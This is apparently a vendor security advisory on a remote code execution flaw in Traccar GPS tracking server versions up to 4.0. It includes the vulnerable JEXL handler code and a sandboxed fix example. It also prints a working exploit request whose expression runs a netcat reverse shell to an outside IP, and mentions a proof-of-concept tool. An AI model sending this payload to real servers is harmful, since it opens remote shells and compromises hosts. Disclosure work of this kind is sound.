Our security team discovered a Remote Code Execution (RCE) vulnerability in the GPS vehicle tracking system Traccar (version <= 4.0). This allows an attacker to compromise the server’s host via a self-registered user account.
If you use Traccar server, please update to >= v4.1 as soon as possible.
Traccar is a widely deployed open-source GPS tracking system that supports over one thousand different devices and protocols. The server collects tracking data from those devices and exposes it through a web portal to support organisational services such as logistics and efficient transportation worldwide.
A feature of the application allows a self-registered user to create expressions which normalise the output of their tracking devices in order to improve integration with the application.
One example is synthesising the engine state of a vehicle, where the particular device does not report that data, by inferring it from the device's battery charge state.
These expressions are interpreted by the third-party JEXL engine (JexlEngine) without any sandbox restricting which Java classes an expression may reach from within the Java Virtual Machine (JVM). As such, a crafted JEXL expression can load arbitrary JVM classes and allow an attacker to compromise the server.
The following request, sent by an authenticated self-registered user to the computed-attribute test endpoint, demonstrates the issue:

POST /traccar/api/attributes/computed/test?deviceId=1 HTTP/1.1
Host: foo.host.com
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Cookie: JSESSIONID=...; ext-devices-...

{"id":-1,"description":"test","type":"string","attribute":"raw",
 "expression":"''.class.class.forName('java.lang.Runtime').getRuntime().exec('nc -nv 1.2.3.4 443 -e /bin/bash')"}
The vulnerable handler (abridged; "..." marks code elided on the page):

// src/org/traccar/processing/ComputedAttributesHandler.java
package org.traccar.processing;

...
// JEXL 2 API, as implied by the no-argument JexlEngine constructor and setStrict()
import org.apache.commons.jexl2.JexlEngine;
import org.apache.commons.jexl2.JexlException;
import org.apache.commons.jexl2.MapContext;
import org.traccar.model.Position;

@ChannelHandler.Sharable
public class ComputedAttributesHandler extends BaseDataHandler {

    private final JexlEngine engine; // declaration elided on the page

    public ComputedAttributesHandler() {
        // A plain JexlEngine with no sandbox: expressions may introspect any class
        // reachable from the JVM, including java.lang.Runtime.
        engine = new JexlEngine();
        // Strict mode only governs unresolved variables; it does not limit which classes are reachable.
        engine.setStrict(true);
        ...
    }

    private MapContext prepareContext(Position position) {
        MapContext result = new MapContext();
        ...
        return result;
    }

    // The user-controlled expression string is compiled and evaluated as-is.
    public Object computeAttribute(Attribute attribute, Position position) throws JexlException {
        return engine.createExpression(attribute.getExpression()).evaluate(prepareContext(position));
    }

    ...
}
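The following is an added example, not Traccar's code and not its 4.1 fix, showing how a handler like the one above can evaluate the same kind of user-supplied expression behind a default-deny JEXL sandbox. It assumes Apache Commons JEXL 3.2 or later on the classpath (the handler on the page uses the older JEXL 2 no-argument constructor, which has no JexlBuilder); the class SandboxedAttributeEvaluator, the helper AttributeFunctions and the context variables battery, speed and fn are constructed for this illustration.

```java
// Added example, not Traccar's code: evaluating user-supplied computed-attribute
// expressions behind a default-deny JEXL sandbox. Assumes Apache Commons JEXL 3.2+
// on the classpath; class, method and variable names here are hypothetical.
import java.util.Map;
import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlException;
import org.apache.commons.jexl3.MapContext;
import org.apache.commons.jexl3.introspection.JexlSandbox;

public class SandboxedAttributeEvaluator {

    /** Constructed helper exposed to expressions; only what it declares is reachable. */
    public static final class AttributeFunctions {
        public double round(double value, int digits) {
            double scale = Math.pow(10, digits);
            return Math.round(value * scale) / scale;
        }
    }

    private final JexlEngine engine;

    public SandboxedAttributeEvaluator() {
        // false: nothing is permitted unless explicitly allowed (default deny).
        JexlSandbox sandbox = new JexlSandbox(false);
        // Allow-list exactly one class and one method on it. java.lang.String,
        // java.lang.Class, java.lang.Runtime etc. stay unreachable, so a
        // ''.class... reflection chain fails at its very first step.
        sandbox.allow(AttributeFunctions.class.getName()).execute("round");
        engine = new JexlBuilder()
                .sandbox(sandbox)
                .strict(true)   // unresolved variables/methods are errors, not null
                .silent(false)  // errors are thrown rather than swallowed
                .create();
    }

    /** Builds the context from a device report as flat variables; no Position object is exposed. */
    private JexlContext prepareContext(Map<String, Object> attributes) {
        JexlContext ctx = new MapContext();
        attributes.forEach(ctx::set);
        ctx.set("fn", new AttributeFunctions());
        return ctx;
    }

    /** Evaluates one expression; returns null when the sandbox rejected it. */
    public Object compute(String expression, Map<String, Object> attributes) {
        try {
            return engine.createExpression(expression).evaluate(prepareContext(attributes));
        } catch (JexlException e) {
            // The expression touched something outside the allow-list: log it for
            // detection purposes and treat the attribute as having no value.
            System.err.println("rejected expression: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) {
        SandboxedAttributeEvaluator evaluator = new SandboxedAttributeEvaluator();
        // Constructed sample report: no ignition field, so it is inferred from battery charge.
        Map<String, Object> report = Map.of("battery", 95.5, "speed", 12.34);

        // Legitimate normalisation expressions of the kind the feature exists for.
        System.out.println(evaluator.compute("battery > 90 ? 'on' : 'off'", report));
        System.out.println(evaluator.compute("fn.round(speed, 1)", report));

        // Reflection probe of the shape used in the request above; the sandbox
        // rejects the '.class' property read because java.lang.String is not allowed.
        System.out.println(evaluator.compute("''.class.getName()", report));
    }
}
```

With the sandbox in default-deny mode, the only objects an expression can call methods on are the ones the server explicitly allow-lists, and a rejected expression surfaces as a JexlException that can be logged and alerted on rather than silently evaluating. Comparisons and arithmetic on context variables do not go through the sandbox, so ordinary normalisation expressions keep working.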
A proof-of-concept tool (traccar_exploit.v1.py) was written to exploit this vulnerability and is demonstrated in this video.
AppCheck is a software security vendor based in the UK, offering a leading security scanning platform that automates the discovery of security flaws within organisations' websites, applications, network and cloud infrastructure. AppCheck are authorized by the Common Vulnerabilities and Exposures (CVE) Program as a CVE Numbering Authority (CNA).